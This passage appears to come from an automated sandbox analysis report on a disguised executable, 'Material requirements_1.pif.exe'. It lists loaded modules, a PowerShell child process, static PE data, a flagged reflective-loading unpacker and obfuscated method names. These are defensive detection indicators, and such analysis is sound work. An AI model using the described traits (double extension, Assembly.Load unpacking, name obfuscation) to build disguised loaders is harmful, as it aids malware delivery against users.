                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Material requirements_1.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Material requirements_1.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Material requirements_1.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: VpNo.pdbSHA256+ source: Material requirements_1.pif.exe
                Source: Binary string: VpNo.pdb source: Material requirements_1.pif.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.cs.Net Code: LN6dLkddfT System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.cs.Net Code: LN6dLkddfT System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.70b0000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.2d94fd0.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.cs.Net Code: LN6dLkddfT System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCF3
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_02D09C61 push 14052993h; iretd 0_2_02D09C6D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00434006 push ecx; ret 7_2_00434019
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004567F0 push eax; ret 7_2_0045680E
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0045B9DD push esi; ret 7_2_0045B9E6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00463EF3 push ds; retf 7_2_00463EEC
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00455EBF push ecx; ret 7_2_00455ED2
                Source: Material requirements_1.pif.exeStatic PE information: section name: .text entropy: 7.965477253296922
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, EXjeaLC6h752HH7SeQ.csHigh entropy of concatenated method names: 'TFLq6AxL1o', 'PFdqPKE5v3', 'gsPqkyHQoj', 'pY1qMWFbrm', 'q8GqeaOksl', 'mK8q1JHFxP', 'P4Eq259jhj', 'qIMquC5hd7', 'NxXqRjjM3Z', 'imGqpoU9Kj'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.csHigh entropy of concatenated method names: 'AZuF0V4pVe', 'dVlFJknnI8', 'LVXFqePZDR', 'mgwFx6tFAl', 'woTFc1Wamb', 'VRPFO4QgVd', 'rBBFKEYi3w', 'vN5FnNWufU', 'rtdFTE6t0l', 'oCQF3XIu5n'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, ODy3AcyoxB4Nfbptyy.csHigh entropy of concatenated method names: 'N72xVB9kVx', 'IP7xD7SKOw', 'GmFxCBeBIS', 'jxFxybOjy6', 'GCxx8CXB44', 'FqPx93A5lx', 'apkxGv7X74', 'qjHxjWMbUJ', 'O7SxwTv85d', 'WwqxWNEx7V'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, c5MoKBUq8qvmpdLPkr.csHigh entropy of concatenated method names: 'RM8O0lJpm6', 'qf4OqAP7pH', 'qeZOcitTqd', 'gOpOKpGgRV', 's6dOnnBKhC', 'irDce3yiXE', 'gvxc1hNpZ5', 'pgjc2r1qiJ', 'NXicu1OKqV', 'NR0cRZZwVG'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, hSx5Fvf2t2qMkrPqAm.csHigh entropy of concatenated method names: 'KepOr02QUK', 'sjtO4GrVWI', 'OwZOLKEPIg', 'bXiOVCsmxj', 'a7LODH5yhP', 'HpoObPBFY0', 'vXrOyyf1ql', 'IC3OSD9HEP', 'tKnZVZm5ooucld23Jfh', 'ls0oQZmnDQPunTd28tU'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, aISE6MkWVU1tHktetQ.csHigh entropy of concatenated method names: 'ToString', 'ScF9tnqnss', 'lg19XSjeZM', 'JdL9hcW3JX', 'vDR9fp1mVg', 'mEy9sbvgWL', 'AYn9NlA8Kk', 'bUc9gok9uM', 'vvr95gq11u', 'h8e9i9gwMl'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, xmYKJGAI6uNbPA6FLl.csHigh entropy of concatenated method names: 'KsMQCjP8yY', 'lgAQywpRWy', 'YtnQUeds0m', 'S7TQXqEuBJ', 'qtDQfRJ8sb', 'LB5Qs98bEb', 'cSyQgrJ3x4', 'Fs1Q5eN3B4', 'hnGQBM9BuW', 'cPqQtdO6UG'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, Q2qYfI6wmsZigOBGuZ.csHigh entropy of concatenated method names: 'FW98BTg6wT', 'F4e8YwX87m', 'FqM86wUHKK', 'vWU8PrlgPA', 'YXE8XfxK9G', 'IlQ8hDSxuJ', 'AJA8f0ywWK', 'iTV8sEMuqY', 'F278N6I7ad', 'nT58gEaBf8'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, bRGCNDiLG7EYfq4xZj.csHigh entropy of concatenated method names: 'aEYK42t9In', 'nNPKH0745U', 'qkVKLAYjby', 'ujmKV3vjuS', 'iUDKlCXOFP', 'CvNKDoRloW', 'HnvKbsxgFI', 'sqvKCFy6rP', 'NK8KylTiD7', 'vDjKSvPEq4'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, llx0TaqgR8TBmw4VB1.csHigh entropy of concatenated method names: 'Dispose', 'QBSmR7giCC', 'NdJaXaffhG', 'vAQxvMgZ1i', 'T91mpGVTtN', 'TC6mzt2JCd', 'ProcessDialogKey', 'cw7aoT6jPT', 'mvCam5B0IB', 'k6MaaouI0l'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, lW7pBiMxd5BWrJjUJI.csHigh entropy of concatenated method names: 'JXvG3hwEn9', 'MHbGZbTNFF', 'ToString', 'WyWGJJnTWe', 'q9CGqjfRUs', 'NNAGxOi13Z', 'AS6GcVcITs', 'mgoGO7d07y', 'HJfGKCRwAN', 'hZmGnpHCK7'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, vT6jPTRZvC5B0IBT6M.csHigh entropy of concatenated method names: 'O5LwUuQIZ6', 'LBDwXGDySg', 'xxpwhHeca5', 'J8gwfXKQxg', 'yQfwsWpdZM', 'qNVwNc6jD4', 'sZ6wgcXYgW', 'FZEw5WunDX', 'ufEwiZNuUZ', 'OwZwBqfrwf'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, omvIrPmob14E5fcrVR8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EsYWt0hBJC', 'OZ3WYRj5iJ', 'YP8WAZHUCA', 'KX4W6Gi4kW', 'W0RWPC3UDl', 'rrYWkmpRnd', 'aGEWMP0n7Q'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, zKIuKsxf8qPDckMuAw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FvvaRSIgp6', 'gQpapHNXrx', 'ksqazadPPI', 'I28FoK5lnF', 'bkpFmm5BJC', 'l2cFa682rS', 'CJMFF9tJX5', 'RWCVefb0IAwxa03BdGv'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, X4l6jezAlWdqIXtk64.csHigh entropy of concatenated method names: 'rPLWDSGWiG', 'hksWCdlhpa', 'OxZWyYCuQ2', 'cicWUHkD0C', 'hJoWXJ04k9', 'z84WfR8LUr', 'cf3WsswSKB', 'Em2Wr5Lvum', 'LAsW4jl2tT', 'vleWHAHdfJ'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, hoe2Wddu8RsTrfs01r.csHigh entropy of concatenated method names: 'AGymKXjeaL', 'Rh7mn52HH7', 'ioxm3B4Nfb', 'YtymZyxk8X', 'Tvvm8vBF5M', 'aKBm9q8qvm', 'BLFdi49QZ2kvO9mP5Z', 'AkBkhuKS4jY4S40mkb', 'a78mmx5yxd', 'xpvmF6m8p3'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, DNkgN82fNABS7giCCM.csHigh entropy of concatenated method names: 'IZ9w8gEnQA', 'L4BwGoyEAY', 'v8gwwtmhd7', 'XxIwINVwwe', 'h5hwvFhQQM', 'ocFwrRX3iE', 'Dispose', 'FUPjJaIdcy', 'rWWjqSNGrg', 'z8sjxayVk5'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, gn6YHxgUYnQMt9eQgY.csHigh entropy of concatenated method names: 'VffKJdggpC', 'DcXKxhJg31', 'vg5KOwRqvw', 'sZ9OpG2Sdv', 'Tb7Oz5hvYZ', 'OQuKok0UC5', 'sQGKmKddBo', 'dTQKaJejov', 'pnOKF5xyuB', 'i6cKdDWkGf'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, MO4jLka0yHQyk46IRI.csHigh entropy of concatenated method names: 'wWTLTli2L', 'cEeV0mT27', 'eeiDQhsFU', 'qjGb4KiAP', 'rYXyrkV4c', 'lu7SGlG0B', 'vej1qWJmShifR6c9HN', 'bvUAHs2xMgZDO9vL6c', 'LVojS40qW', 'SmgWbQiDE'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, q0X39GmmtPhntPZMeBf.csHigh entropy of concatenated method names: 'ACVWpuxh8p', 'AZAWzy19O0', 'XATIoaQ3vg', 'xdCIm2GZ6K', 'YxhIaBpyFC', 'qCUIFll8df', 'MjEIdOUiR6', 'IcnI0d5pvB', 'QQsIJCLfJ9', 'sAhIqW5bbB'
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, mPifxm1D3vFDQQOTHw.csHigh entropy of concatenated method names: 'LPFGuk5rat', 'OyNGpacJFF', 'UQAjoaSgSp', 'SbQjmLuKuR', 'bw3GtjsiUJ', 'Q3kGYOSANI', 'vnCGAHvN0F', 'cRjG62Bbiv', 'BNHGPFAPUw', 'KnTGky1M6N'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, EXjeaLC6h752HH7SeQ.csHigh entropy of concatenated method names: 'TFLq6AxL1o', 'PFdqPKE5v3', 'gsPqkyHQoj', 'pY1qMWFbrm', 'q8GqeaOksl', 'mK8q1JHFxP', 'P4Eq259jhj', 'qIMquC5hd7', 'NxXqRjjM3Z', 'imGqpoU9Kj'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.csHigh entropy of concatenated method names: 'AZuF0V4pVe', 'dVlFJknnI8', 'LVXFqePZDR', 'mgwFx6tFAl', 'woTFc1Wamb', 'VRPFO4QgVd', 'rBBFKEYi3w', 'vN5FnNWufU', 'rtdFTE6t0l', 'oCQF3XIu5n'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, ODy3AcyoxB4Nfbptyy.csHigh entropy of concatenated method names: 'N72xVB9kVx', 'IP7xD7SKOw', 'GmFxCBeBIS', 'jxFxybOjy6', 'GCxx8CXB44', 'FqPx93A5lx', 'apkxGv7X74', 'qjHxjWMbUJ', 'O7SxwTv85d', 'WwqxWNEx7V'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, c5MoKBUq8qvmpdLPkr.csHigh entropy of concatenated method names: 'RM8O0lJpm6', 'qf4OqAP7pH', 'qeZOcitTqd', 'gOpOKpGgRV', 's6dOnnBKhC', 'irDce3yiXE', 'gvxc1hNpZ5', 'pgjc2r1qiJ', 'NXicu1OKqV', 'NR0cRZZwVG'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, hSx5Fvf2t2qMkrPqAm.csHigh entropy of concatenated method names: 'KepOr02QUK', 'sjtO4GrVWI', 'OwZOLKEPIg', 'bXiOVCsmxj', 'a7LODH5yhP', 'HpoObPBFY0', 'vXrOyyf1ql', 'IC3OSD9HEP', 'tKnZVZm5ooucld23Jfh', 'ls0oQZmnDQPunTd28tU'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, aISE6MkWVU1tHktetQ.csHigh entropy of concatenated method names: 'ToString', 'ScF9tnqnss', 'lg19XSjeZM', 'JdL9hcW3JX', 'vDR9fp1mVg', 'mEy9sbvgWL', 'AYn9NlA8Kk', 'bUc9gok9uM', 'vvr95gq11u', 'h8e9i9gwMl'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, xmYKJGAI6uNbPA6FLl.csHigh entropy of concatenated method names: 'KsMQCjP8yY', 'lgAQywpRWy', 'YtnQUeds0m', 'S7TQXqEuBJ', 'qtDQfRJ8sb', 'LB5Qs98bEb', 'cSyQgrJ3x4', 'Fs1Q5eN3B4', 'hnGQBM9BuW', 'cPqQtdO6UG'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, Q2qYfI6wmsZigOBGuZ.csHigh entropy of concatenated method names: 'FW98BTg6wT', 'F4e8YwX87m', 'FqM86wUHKK', 'vWU8PrlgPA', 'YXE8XfxK9G', 'IlQ8hDSxuJ', 'AJA8f0ywWK', 'iTV8sEMuqY', 'F278N6I7ad', 'nT58gEaBf8'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, bRGCNDiLG7EYfq4xZj.csHigh entropy of concatenated method names: 'aEYK42t9In', 'nNPKH0745U', 'qkVKLAYjby', 'ujmKV3vjuS', 'iUDKlCXOFP', 'CvNKDoRloW', 'HnvKbsxgFI', 'sqvKCFy6rP', 'NK8KylTiD7', 'vDjKSvPEq4'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, llx0TaqgR8TBmw4VB1.csHigh entropy of concatenated method names: 'Dispose', 'QBSmR7giCC', 'NdJaXaffhG', 'vAQxvMgZ1i', 'T91mpGVTtN', 'TC6mzt2JCd', 'ProcessDialogKey', 'cw7aoT6jPT', 'mvCam5B0IB', 'k6MaaouI0l'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, lW7pBiMxd5BWrJjUJI.csHigh entropy of concatenated method names: 'JXvG3hwEn9', 'MHbGZbTNFF', 'ToString', 'WyWGJJnTWe', 'q9CGqjfRUs', 'NNAGxOi13Z', 'AS6GcVcITs', 'mgoGO7d07y', 'HJfGKCRwAN', 'hZmGnpHCK7'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, vT6jPTRZvC5B0IBT6M.csHigh entropy of concatenated method names: 'O5LwUuQIZ6', 'LBDwXGDySg', 'xxpwhHeca5', 'J8gwfXKQxg', 'yQfwsWpdZM', 'qNVwNc6jD4', 'sZ6wgcXYgW', 'FZEw5WunDX', 'ufEwiZNuUZ', 'OwZwBqfrwf'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, omvIrPmob14E5fcrVR8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EsYWt0hBJC', 'OZ3WYRj5iJ', 'YP8WAZHUCA', 'KX4W6Gi4kW', 'W0RWPC3UDl', 'rrYWkmpRnd', 'aGEWMP0n7Q'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, zKIuKsxf8qPDckMuAw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FvvaRSIgp6', 'gQpapHNXrx', 'ksqazadPPI', 'I28FoK5lnF', 'bkpFmm5BJC', 'l2cFa682rS', 'CJMFF9tJX5', 'RWCVefb0IAwxa03BdGv'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, X4l6jezAlWdqIXtk64.csHigh entropy of concatenated method names: 'rPLWDSGWiG', 'hksWCdlhpa', 'OxZWyYCuQ2', 'cicWUHkD0C', 'hJoWXJ04k9', 'z84WfR8LUr', 'cf3WsswSKB', 'Em2Wr5Lvum', 'LAsW4jl2tT', 'vleWHAHdfJ'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, hoe2Wddu8RsTrfs01r.csHigh entropy of concatenated method names: 'AGymKXjeaL', 'Rh7mn52HH7', 'ioxm3B4Nfb', 'YtymZyxk8X', 'Tvvm8vBF5M', 'aKBm9q8qvm', 'BLFdi49QZ2kvO9mP5Z', 'AkBkhuKS4jY4S40mkb', 'a78mmx5yxd', 'xpvmF6m8p3'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, DNkgN82fNABS7giCCM.csHigh entropy of concatenated method names: 'IZ9w8gEnQA', 'L4BwGoyEAY', 'v8gwwtmhd7', 'XxIwINVwwe', 'h5hwvFhQQM', 'ocFwrRX3iE', 'Dispose', 'FUPjJaIdcy', 'rWWjqSNGrg', 'z8sjxayVk5'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, gn6YHxgUYnQMt9eQgY.csHigh entropy of concatenated method names: 'VffKJdggpC', 'DcXKxhJg31', 'vg5KOwRqvw', 'sZ9OpG2Sdv', 'Tb7Oz5hvYZ', 'OQuKok0UC5', 'sQGKmKddBo', 'dTQKaJejov', 'pnOKF5xyuB', 'i6cKdDWkGf'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, MO4jLka0yHQyk46IRI.csHigh entropy of concatenated method names: 'wWTLTli2L', 'cEeV0mT27', 'eeiDQhsFU', 'qjGb4KiAP', 'rYXyrkV4c', 'lu7SGlG0B', 'vej1qWJmShifR6c9HN', 'bvUAHs2xMgZDO9vL6c', 'LVojS40qW', 'SmgWbQiDE'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, q0X39GmmtPhntPZMeBf.csHigh entropy of concatenated method names: 'ACVWpuxh8p', 'AZAWzy19O0', 'XATIoaQ3vg', 'xdCIm2GZ6K', 'YxhIaBpyFC', 'qCUIFll8df', 'MjEIdOUiR6', 'IcnI0d5pvB', 'QQsIJCLfJ9', 'sAhIqW5bbB'
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, mPifxm1D3vFDQQOTHw.csHigh entropy of concatenated method names: 'LPFGuk5rat', 'OyNGpacJFF', 'UQAjoaSgSp', 'SbQjmLuKuR', 'bw3GtjsiUJ', 'Q3kGYOSANI', 'vnCGAHvN0F', 'cRjG62Bbiv', 'BNHGPFAPUw', 'KnTGky1M6N'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, EXjeaLC6h752HH7SeQ.csHigh entropy of concatenated method names: 'TFLq6AxL1o', 'PFdqPKE5v3', 'gsPqkyHQoj', 'pY1qMWFbrm', 'q8GqeaOksl', 'mK8q1JHFxP', 'P4Eq259jhj', 'qIMquC5hd7', 'NxXqRjjM3Z', 'imGqpoU9Kj'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.csHigh entropy of concatenated method names: 'AZuF0V4pVe', 'dVlFJknnI8', 'LVXFqePZDR', 'mgwFx6tFAl', 'woTFc1Wamb', 'VRPFO4QgVd', 'rBBFKEYi3w', 'vN5FnNWufU', 'rtdFTE6t0l', 'oCQF3XIu5n'
